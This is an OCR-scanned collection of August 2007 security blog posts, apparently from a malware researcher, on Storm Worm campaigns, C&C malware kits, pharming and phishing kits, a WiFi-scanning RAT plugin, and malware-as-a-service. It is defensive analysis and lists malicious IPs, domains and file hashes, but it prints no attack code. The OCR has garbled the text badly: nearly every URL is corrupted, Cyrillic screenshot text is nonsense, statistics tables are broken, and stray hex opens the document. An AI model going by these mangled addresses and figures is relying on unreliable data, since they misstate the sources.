d5\x99\xc1\x92\xc3\x85\xd5\x96\x96\x91\x95\x85\xd5\xc6\x97\xc1\xc1\x85\xd5\xc5\x98\x90\x96\x 


Offensive Storm Worm Obfuscation (2007-08-21 
12:54) 


Malware authors, often pissed off at the detection rates of 
their malware releases, tend to include offensive 


comments or messages within the malware's code against 
anti virus vendors. At this Storm Worm URL we see 


offensive function within the obfuscated exploit aiming at 
Kaspersky. 

The [l]recent Storm Worm campaign may indeed look like a 
huge security threat given the millions of emails 

sent, however, I feel [2]more awareness should be built on 
the fact that [3]the malware has slightly adapted, and 




is using browser based vulnerabilities (client side one) to 
automatically push the binary onto the host, compared 

to the urban legend of not openning email attachments from 
unknown parties. The current Storm Worm's main 

benefit in terms of efficiency is the client side exploited 
vulnerabilities within each and every malicious IP, and 

the main weakness is the pattern based nature of the 
binaries hosted at the IPs such as maliciousIP/file.php and 

maliciousIP/ecard.exe, thefore periodically verifying the 
checksums of the still active Storm Worm IPs results in new 

malware variants. Or starting from the basic premise that 
prevention is better than the cure, Bleedingthreats have 

already released [4]IDS signatures for the Storm Worm : 

11 This first list has over 800 servers that are confirmed 
hostile , and were active in the last 24 hours. 

[ 5 ] http://www.bleedingthreats. net/rules/bleeding-storm, rules 

And a version prebuilt with a 30 day Snortsam block: 

[ 6] http://www.bleedingthreats. net/rules/bleeding-storm- 
BLOCK.rules 

We'11 be collating Storm related links and data sources on the 
following page which is referenced in these sigs: 

[ 7 ] http://doc. bleedingthreats. net/bin/vie w/Main/Storm Worm " 

Let's assess yet another Storm Worm infected PC and reveal 
yet another campaign called BYDLOSHKA : 



423 


01. 75.37.132.98 is using the [8]Q4-06 Roll-up package 
exploits kit like all Storm Worm URLs 

02. The downloader makes a DNS query to fncarp.com 
(24.1.243.46) where we have a second offensive ob¬ 
fuscation and the BODLOSHKA campaign under the following 
URLs : snlilac.com/ind.php (123.236.116.111) ; 

eqcorn.com/ind.php (66.24.211.96) ; 
fncarp.com/ind.php The downloaders here obtain the 
actual binaries from a third party (81.9.141.13) creating a 
fast-flux network. 

03. What's interesting and rather disturbing is a proof that 

[9] phishers, spammers and malware authors in¬ 
deed work together, as Storm Worm is also comming in the 
form of phishing emails where the main objective isn't 

to steal confidential accounting data, but to only infect the 
users visiting the site (74.102.159.188) 

All this leads me to the conclusion that the campaign may in 
fact be a Russian operation. 

Related posts: 

[10] Oh boy, more Nuwar tricks! 

[11] New Storm Front Moving In 

[12] Zhelatin/Storm changes yet again 

1. http://ddanchev.blo as pot.com/2007/08/storm-worm- 
malware-back-in- a ame.html 






2. http://ddanchev.blo as DOt.com/2007/02/storm-worm- 
switchin a-propaa ation.html 

3. http://ddanchev.blo as pot.com/20Q7/01/social-en a ineerin a- 
and-malware.html 

4. 

http://www.bleedin a threats.net/index. ph p/2007/07/19/storm- 

worm-si a nature/ 

5. http://www.bleedin a threats.net/rules/bleedin a -storm.rules 

6. http://www.bleedin a threats.net/rules/bleedin a -storm- 
BLOCK. rules 

7. http://doc.bleedin a threats.net/bin/view/Main/StormWorm 

8. http://www.dra a oslun a u.com/2007/Q3/12/top-5-web- 
ex ploits-for-februarv-2007/ 

9. http://www.dslreports.com/forum/rl8915715-Phish-Lo a in- 
Information 

10 . 

http://www.avertlabs.com/research/blo a /index. ph p/2007/08/ 

21/oh-bov-more-nu war-tricks/ 

11 . 

http://www.svmantec.com/enterprise/securitv_response/webl 
oa /2007/08/new storm front movin a Jn.html 

12. http://www.f-secure.eom/weblo a /#00001255 
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WHATOO 
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OUR 

CUSTOMERS 
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SECURITY 
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WE REAO 
SCHNEIER’S 
BOOK 
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GOVERNMENT 
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LA, LA. LA 
WE’RE NOT 
LISTENING 

IT DOESN'T 
NEED TO BE 
VERY SECURE 

NO 

COMMENT 

ITSA 

FEATURE 

OUR USERS 
WANT 

YOU MUST BE 
BEING PAID 

BY OUR 
COMPETITION 

SB? 

WE MEET ALL 
INDUSTRY 
STANDARDS 

WE’RE FULLY 
150-9001 
COMPLIANT 

EVERYBODY 
DOES FT 

THIS WAY 
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ENCRYPTION 
ALGORITHMS 
PREVENT THAT 

YOU’LL BE 
HEARING FROM 
OUR LAWYERS 

YOU ARE IN 
VIOLATION Of THE 
DMCA 

YOU’RE BEING 
IRRESPONSIBLE 

NOTHING IS 
100S SECURE 
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MUM80 JUMBO 

NOBODY 

WILL EVER 
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IT WOULO BE 
TOO EXPENSIVE 

TO FIX THAT 

IF YOU HADN'T 
TOLO ANYONE, 
rr WOULD STILL 


Excuse Us for Our Insecurities (2007-08-22 14:01) 

This [l]Security Public Relations Excuse Bingo is very 
entertaining as it objectively provides random excuses that 
security vendors and public companies often use, when not 
addressing a security issue concerning them, and 
consequently 

their customers. You may also find Matasano's [2]Kubler-Ross 
Model Of Vulnerability Management informative. 

1. http://www.cr v oto.com/bin ao/pr 

2. http://www.matasano.com/lo a /40Q/the-kubler-ross-model- 
of-vulnerabilitv-mana a ement/ 
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The Nuclear Malware Kit (2007-08-22 14:11) 

Web based C &C malware kits are already a commodity, and 
with the source codes of [l]MPack and [2]lcePack freely 

available in the wild, modifications of the kits with far more 
advanced features will sooner or later get released. 

But what is prompting the botnet masters' interest of a web 
interface to their fast-flux networks, and in-depth 





























statistics for the infected hosts? It's a results-oriented 
mindset, and the core objective of achieving [3]malicious 

economies of scale. What does this mean from a 
psychological point of view? It means that even before 
launching 

a mass-spreading attack they've already anticipated its 
success so that more efforts go to assessing which are the 

most effective campaigns, countries prone to malware 
infections, and specific browser vulnerabilities used in order 

for them to tailor even more successful attacks in the future. 
When looking at screenshots of stats like these you 

realize that the browser and client side vulnerabilities in 
principle are the infection vector of choice, especially the 
unpatched ones, as given the last wide scale IFRAME attacks 
we've seen in the past six months, all the malware kits 

were using outdated browser vulnerabilities, and despite 
that, achieved enormous success. 

More screenshots of a previous version of the Nuclear 
Malware Kit - yet another web based C &C available for sale : 
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CTATWCTHKA 


( fdlfOMKO 


( iTATISTICS ] | BROWSERS J [ IP'S J l CONFIO J ( CLEANUP ] 


Mroro Bj.-2 


lipayjep 

3<inpo< on 

Hpofinaon 

miae 

444 

69 06%) 

mozlfo 
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4(3%) 

opera 

29 

0(0%) 

Lonquetof 

16 

0(0%) 


3 

0(0%) 


Bcero sanpocce 648 


CTATMCTMKA 


CT41»CTW<* l STATISTICS j [ BROWSERS ] [ IP'S J l COMF16 ] [ CLEANUP ] 
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Repents 

Sanpocoe 

npoGntlOS 

Wfriioi** longfiofrt 

33 

0(0.00%) 

Wirxiaw*. >P 

536 

58(10.82%) 

unknown 

10 

0(0.00%) 

M*anto>n 

12 

0 (0.00%) 

Windows 98 

ZZ 

9(40.91%) 

Mac OS X 

8 

0(0.00%) 

Windows 2000 

21 

5(23.81%) 

Wlrdows 2003 

5 

l (20.00%) 

Unix 

1 

0(0.00%) 


Bcero ianpocce: 648 


- Infections per browser 

- Infections per OS 
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PC1AND 138 

LITHUANIA 1 
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SPAIN 26 

AUSTRIA 3 

CANADA 12 

NORWAY 20 

AUSTRALIA 14 

RUSSIAN FETCRATTON 13 

JAPAN 4 

UNITED KINGDOM 27 

SWEDEN 6 

TURLEY 6 

FRANCE 14 

El SALVADOR 1 

LATVIA 1 


COLOMBIA 

ROMANIA 

DENMARK 

NEW ZEALAND 

AZERBAIJAN 

LUXEMBOURG 


CYPRUS 1 

MEXICO 3 

FINLAND 6 

JORDAN 1 

ITALY 12 

NCTt€PlAN05 10 

CHIU i 


npufiMeao 

4 (10.26%) 
0(6.15%) 
16(11.59% 
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II (9.40%) 
5(19.23%) 
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1(5.00%) 
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1 (3.70%) 
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0 (0 00 %) 
0 ( 0 . 00 %) 
0 ( 0 . 00 %) 
l (33.33% 
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t (lOO Oirv>j 


0 ( 0 . 00 %) 
0 ( 0 . 00 %) 
2(16.67%) 
3(30.00%) 
0 (O.OOY.) 


- Infections per country 

Related posts: 

[4] The Black Sun Bot - web based malware 

[5] The Cyber Bot - web based malware 

[6] Malware Embedded Sites Increasing 

[7] Botnet Communication Platforms 

[8] OSINTThrough Botnets 

[9] Corporate Espionage Through Botnets 






1. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in-italv.html 

2. http://ddanchev.blo as pot.com/2007/Q7/icepack-malware- 
kit-in-action.html 

3. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

4. http://ddanchev.blo as pot.com/2007/04/shots-from- 
malicious-wild-west-samole 7672.html 

5. http://ddanchev.blo as pot.com/2007/Q4/shots-from- 
malidous-wild-west-samole 20.html 

6. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-ilncreasin a .html 

7. http://ddanchev.blo as pot.com/2007/Q3/botnet- 
communication-olatforms.html 

8. http://ddanchev.blo as pot.com/2007/Q4/osint-throu ah- 
botnets.html 


9. http://ddanchev.blo as pot.com/2007/05/coroorate- 
es piona a e-throu a h-botnets.html 
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GLOBAL ISLAMIC MEDIA FRONT 

ALLAH IS THE QKEAT 


turui iry-ior-qj mca-qj p-icrm cno-tc pioib pji't ip e ci crjta [» or-c? or rep m-inq to- - 


Welcome 

to 

the Global Islamic Media Front's 
website 


GIMF - "We Will Remain" (2007-08-24 12:16) 

After having [l]both of its blogs [2]shut down, the Global 
Islamic Media Front issued a modest statement M [3]Global 
Islamic Media Front: We were and will remain". But of course - 
however in banner form only. Flere're two [4]more 

GIMF related URIs of [5]a sexy layout in progress, [6]a 
propaganda flash, and an article related to the [7]Middle East 
Media Research Institute (MEMRI). 

1. http://ddanchev.blo as pot.com/20Q7/Q7/ a imf-switchin a- 
blo a s.html 

2. http://ddanchev.blo as pot.com/2007/Q8/ a imf-now- 
permanentlv-shut-down.html 

3. 

http://inshallahshaheed.wordpress.com/2007/08/2Q/ a lobal- 

islamic-media-front-we-were-and-will-remain/ 


4. http://www. a imf.22web.net/ 





















5. http:// g irnf.123.fr/ 


6. http://fares- i ames.bizhat.com/GIMF-falas6een- 
tunadekum.swf 


7. 

http://news.vahoo.eom/s/weeklvstandard/20070801/cm wee 
kl vstandard/unwelcomeinternet a uests 
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Distributed WiFi Scanning Through Malware (2007-08- 
24 12:42) 

[ 1 ] 

Distributed computing through malware, OSINT thought 
botnets, distributed password cracking and distributed 


malicious economies of scale - are all fully realistic nowadays. 
And so is a plugin for a popular RAT which is scanning for 
open WiFi networks based on an [2]article released by the 
inframous 29a group : 
























" This plugin enables you to scan for available nearby 
WLANs. The bins (wifiC.dll and wifiS.dll) have been packed 
with UPX 3.00w. Place them in the \P/ugin\ folder or load 
wifiC.dll manually to use the plugin. " 

Perhaps this is the perfect moment to comment on Maureen 
Vilar's email, a moderator for [3]ClimatePrediction 

at BOINC's project who contacted me regarding my [4]blog 
post on distributed computing through malware, and 

described the incident in details : 

11 The 5000+ computers attached to Wate's account were 
very different in profile from a norma I DC farm and easily 
identified as abnormal. Attached computers are now being 
looked at by members much more critically, it now appears 
that the trojan that attached the computers to Wate's 
account and thus to boinc projects was probably bundled 
with P2P downloads. The owners of the 5000+ computers 
must not have scanned these P2Pdownloads, and many of 
them 

must have failed to investigate why their computers were 
probably running slowly at 100 % CPU, or in thecase of 

laptops why they were in some cases doubtless overheating 
or the batteries running down. They must also have failed to 
check which programs were installed, even though many of 
the affected computers cannot have been running 

normally for everyday use. imagine that many of these 
computers did not have an active or up-to-date firewall, or 

that firewall warnings were ignored. These were all basic 
security failures on the part of the owners of these 5000+ 



computers, some of which were powerful machines. The 
developers of legitimate software unfortunately cannot 

ensure that all computer owners worldwide implement basic 
security measures. The problem of Wate's account was 

first discovered by boinc team crunchers in Italy who took 
speedy action to inform the boinc development team in 

Berkeley. They in turn took rapid action to inform the 
administrators of the affected boinc projects. The Wate 
accounts on all the affected projects were disabled. Because 
boinc projects run a competitive credits system, it is in the 
interests of members to ensure that no-one is able to 
compete dishonestly. " 

To sum up - The BOINC's servers weren't breached and 
malware "pushed" into the participants' hosts through 
BOINC's client, instead BOINC's client got "pulled" from the 
infected PCs, so they started participating in 
ClimatePrediction. 

And obviously, they have anomaly detection practices 
ensuring such incidents get easily detected. 
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Detection rates for the WiFi plugin : 

wifiC.dll 

AVG 2007.08.23 BackDoor.Poisonlvy.B 

Ikarus 2007.08.23 Trojan-Downloader.Win32.QQHelper.vn 

Webwasher-Gateway 2007.08.23 Win32.UPXpacked.gen!94 
(suspicious) 



File size: 198144 bytes 

MD5: 15cbfaled47e45f30be0eb0dcdlec5e3 

SHA1: bdd9994a20b4ae753951c09506ae0e2db59f63e2 

wifiS.dll 

AntiVir 2007.08.23 BDS/BlackH.2005.A.l 
AVG 2007.08.23 BackDoor.Poisonlvy.B 
Panda 2007.08.23 Suspicious file 

Webwasher-Gateway 2007.08.23 Trojan.BlackH.2005.A.l 
File size: 10240 bytes 

MD5: Ilaa54103e7311ad23b4e60292dc9e82 
SHA1: 59e7f0aaa8305ad0c5c830cl6b531dle2ab641b4 

Consider the following scenarios : 

- malware infected PCs actually opening a WiFi connection in 
a port-knocking nature to the wireless botnet master 

only 

- no need for wardriving, as malware authors would quickly 
map the entire WiFi vulnerable population around a given 

region in the age of malware geolocating IPs using 
commercial services 

- once a PC gets infected inside an organization, it can 
automatically turn into a wardriving zombie exposing 
vulnerable WiFi connections within 



- Bluetooth scanning plugins expose even more vulnerable 
Bluetooth-enabled devices in the range of the infected host 

1. http://users.tkk.fi/%7Elauronen/works/hakkeri 2003.pdf 

2. http://hvatus.newffr.com/TAZ/ VX /vxma a s/29a- 
8/Articles/29A-8.Q18 

3. 

http://www.climateprediction.net/user_week/user_of_week. ph 

P- 

4. http://ddanchev.blo as pot.com/2007/Q3/distributed- 
computin a -with-malware.html 
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DIY Pharming Tools (2007-08-25 23:47) 

In a previous post I discussed [l]pharming from the 
perspective of [2]abusing a DNS server and starting a wide- 
scale 






















pharming attack. However, it's also vital to discuss the 
second perspective, namely the malware infected PCs whose 

hosts files could be abused to faciliate MITM phishing attack 
for instance. Consider the following DIY pharming tool 

that basically allows a list of anti virus software's update 
locations IPs to be added, and consequently blocked, as well 
as complete take control over the infected user's perception 
of where exactly is she online. The second version is 

lacking the "add a list" feature, and is entirely phishing 
attacks centered, and the way lists of the process names/files 
for every anti virus software have been used by malware 
shutting down the software, in this very same way, the online 

update locations for multiple AVs are also easily obtainable - 
a topic I covered in [3]a previous post. 

Panda 2007.08.25 Suspicious file 

Prevxl 2007.08.25 Generic.Malware 

File size: 623616 bytes 

MD5: 4ab0d055bee708dd0046af0b8800594a 

SHA1: 41b93el6127964b89bb9e34af8dl2411323e631f 


old 

friend 

recently 

approached 



me 


asking 

for 

my 

opinion 

on 

man-in-the- 
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English Deulsch f 


Dieses Programm erstellt bat-Dateien weiche die 
hostfile mfeieten 
Eine aul diese Weise manipulierte hostfile leitet den 
Zugriff auf websites um 

Die hostfile wird in '‘%windir%\system32\drivers\etc" 
erstellt. 

Um die "Sperre" aufzuheben. einfach die hostfile 
loschen. 

mil freundlichen grlilien Opae 18.06.2007 


About 


lip der PhrshingSite 


w.eiter 


middle phishing attacks, and whether or not I'm aware of any 
such DIY type of functions. Simultaneously, PandaSe- 

curity released a[4] very good screenshot of a feature within 
a botnet's C &C interface, worth seeing for yourself too. 

















Despite that the current [5]"push M phishing model seems to 
be fully working, and keylogging started evolving into 

M [6]form grabbing", MITM phishing attacks I think would 
remain at the bottom of the attack model for the pragmatic 
and efficiency-centered phisher,who would otherwise have to 
either build a botnet on her own, or request access to 

such on demand. 

1. http://en.wikipedia.or a /wiki/Pharmin a 

2. http://ddanchev.blo as pot.com/2007/Q8/pharmin a -attacks- 
throu a h-dns-cache.html 

3. http://ddanchev.blo as pot.com/20Q5/12/ip-cloakin a -and- 
competitive.html 

4. 

http://blo as. pandasoftware.com/blo a s/ima a es/PandalLabs/20 
07/08/21/confi a urer. i pg 

5. http://ddanchev.blo as pot.com/2007/Q7/avera a e-online- 
time-for-phishin a -sites.html 

6. http://ddanchev.blo as pot.com/20Q6/ll/nuclear- a rabber- 
toolkit.html 
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We J ve seen 128 unique DDoS attacks on Estonian websites in the past two weeks 
through ATLAS. 

B H!H5BfW?iilIHil'MiTlHI Attacks were not distributed uniformly , with some sites seeing 
more attacks than others: 


Attacks Destination Address or owner 

35 "195.80,105.107/32" pol.ee 

7 "195.80,106.72/32" www.rligikogu.ee 

www.rlik.ee, 

36 "195.80,109.158/32" www.peaminister.ee, 

www.valitsus.ee 

2 "195.80,124.53/32" m53,envir.ee 

2 "213.184.49.171/32” www.sm.ee 

6 "213.184.49.194/32" www.agri.ee 

4 "213.184.50.6/32" 

35 "213.184.50.69/32- www.rin.ee (Ministry of 

' Finance) 

1 "62.65.192.24/32" 

Your Point of View - Requested! (2007-08-26 21:06) 

Question : What is the most realistic scenario on what 
exactly happened in the recent DDoS attacks aimed at 
Estonia, from your point of view? 

- It was a Russian government-sponsored hacktivism, or shall 
we say a government-tolerated one 

- Too much media hype over a sustained ICMP flood, given 
the publicly obtained statistics of the network traf¬ 
fic 

- Certain individuals of the collectivist Russian society, 
botnet masters for instance, were automatically recruited 

based on a nationalism sentiments so that they basically 
forwarded some of their bandwidth to key web servers 


- In order to generate more noise, DIY DoS tools were 
distributed to the masses so that no one would ever 

know who's really behind the attacks 

- Don't know who did it, but I can assure you my kid was 
playing Isynflood at that time 

- Offended by the not so well coordinated removal of the 
Soviet statue, Russian oligarchs felt the need to 

send back a signal but naturally lacking any DDoS 
capabilities, basically outsourced the DDoS attacks 

- A foreign intelligence agency twisting the reality and 
engineering cyber warfare tensions did it, while taking 

advantage of the momentum and the overall public 
perception that noone else but the affected Russia could be 

behind the attacks 

-1 hate scenario building, reminds me of my academic years, 
however, yours are pretty good which doesn't 

necessarily mean I actually care who did it, and pssst - it's 
not cyberwar, as in cyberwar you have two parties with 

virtual engagement points, in this case it was bandwidth 
domination by whoever did it over the other. A virtual shock 

and awe 
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-1 stopped following the news story by the time every 
reporter dubbed it the first cyber war, and started following it 



again when the word hacktivism started gaining popularity. 
So, hacktivists did it to virtually state their 

political preferences 

[1] Voting link - your opinion is greatly appreciated. 

[2] Stats courtesy of Arbor Networks' [3]ATLAS, among the 
several [4]early warning security event systems pub¬ 
licly available online. 

1. http://www.imedialearn.com/imediapoll/poll. phD? 
code=f!156c39d3c972139c62bc91cl7e2c53 

2. http://asert.arbornetworks.com/2007/Q5/estonian-ddos- 
attacks-a-summarv-to-date/ 

3. http://atlas.arbor.net/ 

4. http://ddanchev.blo as pot.com/2007/06/earlv-warnin a- 
securitv-event-svstems.html 
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The Economics of Phishing (2007-08-28 12:42) 

Years ago, phishing used to be like fishing at least in respect 
to the preparation and the patience required for the 

fisherman to catch something. Nowadays, [l]phishing is like 
fishing with dynamite, very effective and entirely 

efficiency centered. After discussing [2]the economics of 
spamming - within the posts's comments - I emphasized 

on the fact that both the [3]underground's economy supply 
of goods and the [4]phishing ecosystem, are entirely 

based on the cooperating among spammers, phishers and 
malware authors, and so is the rise of the [5]DIY phishing 

kits. I recently came across a very good analysis conducted 
by Cloudmark with a huge sample of phishing emails to 











draw conclusions out of. [6]The Economy of Phishing - A 
Survey of the Operations of the Phishing Market: 

11 l/l/e have conducted extensive research to uncover phishing 
networks. The result is detailed analysis from 3,900,000 

phishing e-mails, 220,000 messages collected from 13 key 
phishing-related chat rooms, 13,000 chat rooms and 

48,000 users, which were spidered across six chat networks 
and 4,400 compromised hosts used in botnets. 11 

The research once again demonstrates the diversity of 
phishing techniques used, and covers the following 
segments - 

Webservers used in phishing attacks; Institutions by 
advertising rate; Institutions by report rate, and perhaps the 
most interesting part is an IRC visualization of underground 
social networks for trading of stolen digital goods. 

Furthermore, it's great to note that it's not just vendors 
actively researching [7]the average time a phishing site 
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- AHOHHMHue DNS-cepBepa ^jih Kaxcaoro aKKayHxa, 

- ExecyTOHHUH 6»Kan flaHHHX Ha cepBep b apyroM 


K pa3MemeHHio sanpemeHH S 


excKoe nopHO, 30 o4>hjihh. ^Himmr 
SanpemeH cnaM c aKKayHTOB, pe raiaMa cnaMOM c HcnojiKsosaHHeM 
ctopohhhx pecypcoB paspemeHa. 



[8] remains online, but also, third-party researchers such as 

[9] Richard Clayton and [10]Tyler Moore at the Security 

Research Computer Laboratory, University of Cambridge with 
some recently released research notes. It's one thing to 

consider the daily reality of malware and phishing pages 
hosted on infected home users' PCs, another to see malicious 

parties offering fast-flux networks on demand while vendors 
are figuring out how to timely shut down the pages, but 

totally out of the blue to see such a party - the always on 
malicious service is ironically down - offering phishing 

hosting and spam sending in between child porn and zoofilia 
hosting. 

1. http://ddanchev.blo as pot.com/2007/07/confirm-vour- 
a ullibilitv.html 








2 . 

http://radar.oreillv.com/archives/2007/01/spamonomics 101. 
html 

3. http://ddanchev.blo as pot.com/2007/03/under a round- 
economvs-su ppl v-of- a oods.html 

4. http://ddanchev.blo as pot.com/2007/Q2/phishin a- 
ecosvstem.html 

5. http://ddanchev.blo as pot.com/2007/Q8/di v- phishin a- 
kits.html 

6 . 

http://www.cloudmark.com/releases/docs/the economy of ph 
ishin a.pdf 

7. http://ddanchev.blo as pot.com/2007/Q7/avera a e-online- 
time-for-phishin a -sites.html 

8. http://ddanchev.blo as pot.com/2007/Q7/avera a e-online- 
time-for-phishin a -sites.html 

9. http://www.li a htbluetouch pa per.or a /2007/08/16/phishin a- 
and-the- a ainin a -of-clue 

10 . 

http://www.li a htbluetouch pa per.or a /2007/08/24/phishin a- 

website-removai-comparin a -banks 
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DIY Phishing Kits (2007-08-29 15:21) 

In times when [l]socially oriented bureaucrats are prompting 
such popular projects as [2]the KisMAC and [3]the 

Default Password List to seek hosting in [4]a foreign country, 
the German scene seems to be very active with yet 

another [5]DIY phishing kit released in the wild which I'll 
dicuss in this post, following the first rather primitive one I 
came across to a while ago. As we've seen with a previous 
phishing kit, and the infamous Rock Phish, malicious 

economies of scale in terms of efficiently generating fake 
pages to be forwarded to a central logging location are the 






















second most important goal of this trend. What's the first? 
It's noise generation compared to the common wisdom 

that such tools are supposed to be exclusive and private. 
Talking about the [6]economics of phishing, with the 

already a commodity scam pages available at the phishers' 
disposal, fast-flux hosting of the pages and maintaining 

their "online lifetime", thus playing a cat and mouse game 
with researchers [7]and vendors shutting [8]them down, is 
perhaps the next stage in further developing the phishing 
ecosystem. 

File size: 5844992 bytes 

MD5:ae3a3cbb873c69843455c46ad6e62f40 

SHA1: 7606b3cccbb3cccb95bbe32b688e350d42aeffc5 

Related posts: 

[9]Pharming Attacks Through DNS Cache Poisoning 
[ 10]DIY Pharming Tools 

1. http://ddanchev.blo as pot.com/2QQ7/Q7/insecure- 
bureaucracv-in- a ermanv.html 

2. http://kismac.de/ 
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3. http://www.phenoelit.de/202/202.html 

4. http://www.phenoelit-us.or a/d pl/dpl.html 















5. http://ddanchev.blo as pot.com/2007/08/di v- ohishin a- 
kits.html 


6. http://ddanchev.blo as pot.com/2007/Q8/economics-of- 
phishin a .html 

7. http://ddanchev.blo as pot.com/2007/Q3/take-this- 
malicious-site-down.html 


8. http://ddanchev.blo as pot.com/2007/Q4/takin a -down- 
ohishin a -sites-business.html 

9. http://ddanchev.blo as pot.com/2007/08/oharmin a -attacks- 
throu a h-dns-cache.html 

10. http://ddanchev.blo as pot.com/2007/08/di v- pharmin a- 
tools.html 
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Storm Worm's use of Dropped Domains (2007-08-29 
17:05) 

The daily updated Bleedingthreats.org's [l]Rules to block 
Storm worm DNS and C &C keeps growing at a significant 

speed, and with the group behind [2]Storm Worm constantly 
[3]changing the social engineering tactics - but 

continuing to exploit already patched vulnerabilities in case 
the user doesn't self infect herself - anti virus vendors are 





























literally crunching out new signatures for yet another Storm 
Worm variant. Reactive response is a daily reality, 

however, proactive response such as making sure your 
customers cannot have their browsers automatically 
exploited 

even if they follow Storm Worm's IP links, is far more 
pragmatic, and the results can be easily evaluated while the 

mass mailing campaign is still active online. Here's [4]an 
interesting list especially the fact that pretty much all of 
these domains were purchased as "dropped" ones, and are 
again part of the BYDLOSHKA campaign with a static 

domain.com/ind.php structure : 

tushove.com; tibeam.com; kqf1oat.com; snbane.com; 
yxbegan.com; snlilac.com; qavoter.com; ptowl.com; wx- 

taste.com; eqcorn.com; ltbrew.com; bnably.com; fncarp.com 

The obfuscated javascript exploiting the browser 
vulnerabilities still includes [5]offensive language against an 

anti virus vendor. Moreover, in case you remember the 
second Storm Worm wave had a very creative feature, 

namely to [6]automatically inject a malicious URL in a forum 
or blog post, right after the infected party has authen¬ 
ticated herself in order for the malware to not have to figure 
out how to bypass the authentication. As it looks like, 

[7]the current campaign has also hit Blogger and many other 
forums as well. 

1. http://www.bleedin a threats.net/rules/bleedin a -storm.rules 





2. http://ddanchev.blQ as pot.com/2007/08/storm-worm- 
malware-back-in- a ame.html 


3. http://ddanchev.blo as pot.com/20Q7/01/social-en a ineerin a- 
and-malware.html 

4. h ttp: //www. d i so a . o r a /text/sto rm-fastfl u x.txt 

5. http://ddanchev.blo as pot.com/2007/08/offensive-storm- 
worm-obfuscation.html 


6. http://ddanchev.blo as pot.com/2007/Q2/storm-worm- 
switchin a-prooaa ation.html 

7. http://sunbeltblo a .blo as pot.com/2007/Q8/storm-worm-hits- 
bloaa er.html 
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Massive Online Games Malware Attack (2007-08-30 
13:55) 

Despite [l]Storm Worm's worldwide media coverage, there're 
many other malware campaigns currently active in the 

wild, again exploiting outdated browser vulnerabilities such 
as this one aiming to steal passwords for [2]MMORPGs. 

The folks at the SANS ISC recently assessed [3]yet another 
malicious URL following a lead from the [4]recently 

breached site of Leuven, a city in Belgium. Apparently, the 
Chinese domain that's naturally exploiting an already 

patched vulnerability has been [5]embedded within many 
other sites as well. MMORPGs password stealing malware 

is nothing new especially in Asia where online games 
dominate the vast majority of Internet activity for local 
netizens. 

[6]Creative typosquatting domain scams are still filling 
different domain niches left at the phisher's disposal. 

VBS/Psyme.CB detection rate : 

Result: 10/32 (31.25 %) 

File size: 9857 bytes 

MD5: 2a5eff5381cec4a7d5478b989aeb2ada 

SHA1: e08cdb74965c31b70ab24d82761b652035283a87 

Trojan-PSW.Win32.WOW.sp detection rate : 

Result: 19/32 (59.38 %) 



File size: 52170 bytes 

MD5: f37al8d2e991ef5cd7ea7a4dfcb6e3f5 

SHA1: Clcbee89bal033b8e739067eab086f70b476c5aa 

What's also worth mentioning is that [7]the campaign has a 
built-in [8]freely available counter compared to 

the typical campaigns who tend to use [9]malware kits for C 
&C and [10]detailed statistics of the [ll]infected 

population. 
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1. http://ddanchev.blo as pot.com/2007/08/storm-worms-use- 
of-dro p ped-domains.html 

2. http://en.wikipedia.or a /wiki/MMORPG 

3. http://isc.sans.or a /diarv.html?storvid = 3324&rss 

4. http://securitv4all.blo as pot.com/2007/Q8/website-bel a ian- 
citv-leuven-defaced-and.html 

5. http://www. a oo a le.com/search7q=xv a aoke.cn/ms/ltts. is 

6. http://ddanchev.blo as pot.com/2007/07/world-of-warcraft- 
domain-scam.html 

7. http://www.sl08.cnzz.com/stat. php? 
id=413942&web id = 413942 


8. http://www.cnzz.com/stat/lo a in. ph p7web id=413942 

9. http://ddanchev.blo as pot.com/2007/Q8/nuclear-malware- 
kit.html 
































10. http://ddanchev.blo as oot.com/2007/07/icepack-malware- 
kit-in-action.html 


11. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in-italv.html 
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Malware as a Web Service (2007-08-31 00:35) 

Popular malware tools such as binders and downloaders 
usually come in a typical software application form. 

Moreover, when I talk about [l]malware services I mean 
[2]crypting, [3]packing and [4]limiting the [5]detection rate 

on demand, while in this case we have a DIY malware as a 
web service, a trend to come or a fad to dissapear, only 

time will show but the possibilities for porting popular 
malware tools in a web service form are quite disturbing. 

In the first example we have a malware downloader as a web 
service with various diversified variables such as custom 










































port and IP to obtain the payload from, as well as the ability 
to modify the extraction and execution of it. Combined 

with the option to choose a packer, and whether or not to 
melt the downloader after it delivers the payload, as well as 
with the opportunity to choose from a set of predefined icons 
or select a custom one, turn this malware web service 

an interesting one to monitor. 

A sample of the first service : 

Result: 5/32 (15.63 %) 

BitDefender 2007.08.31 Generic.Malware.Fdld!.D8E4DFlF 
eSafe 2007.08.29 suspicious Trojan/Worm 
NOD32v2 2007.08.30 probably unknown NewFleur_PE virus 
Sophos 2007.08.30 Mal/Fleuri-D 
Webwasher-Gateway 2007.08.30 

Trojan.Downloader.Win32.ModifiedUPX.gen (suspicious) 

File size: 11776 bytes 

MD5: e9df373fl561bed2a2899707869a7a44 

SHA1: 295c6702cbl9f6b20720057d61d940921602a0cd 

In the second example, we have a malware binder as a web 
service with pretty much identical features with the 
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file to loin ? 

path to install ? 

filename ? 

| execution ? | 

open with ? 

upx? 

1 - 

J | startup folder 

^J|same as source 

|yes zl 

media player (me -| 

yes 

1 

j system32 

^j|same as source 

1 - 3 
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syslem32 
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same as source 
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you can chose an icon for your stub 


13.1 




r | r 


StTr 1 


<■&_ I r M rd - ^> r r H |rj| |r 


eneral features ? 


custom Icon ? 

upx compression stub (9) ? 

melt stub ? 


yes 


yes 


step 3 


first example. If traders of malware services such as the 
above mentioned crypting, packing and ensuring a lower de¬ 
tection rate, start embracing Web 2.0 in the process of 
efficiently construction malware, or providing their customers 
with a DIY experience by constantly ensuring their" web 
dashboard" is up to date with new services and features - it 
can get very ugly. So, let's hope it's just [6]a fad. 

1. http://ddanchev.blo as pot.com/2007/Q5/vet-another- 
malware-cr v ptor-in-wild.html 

2. http://ddanchev.blo as pot.com/2007/Q7/more-malware- 
crv pters-for-sale.html 

3. http://ddanchev.blo as pot.com/2007/Q7/multi-feature- 
malware-cr v pter.html 

4. http://ddanchev.blo as pot.com/2007/Q6/div-malware- 
drop pers-in-wild.html 

5. http://ddanchev.blo as pot.com/2007/Q5/malware-loader- 
for-sale.html 

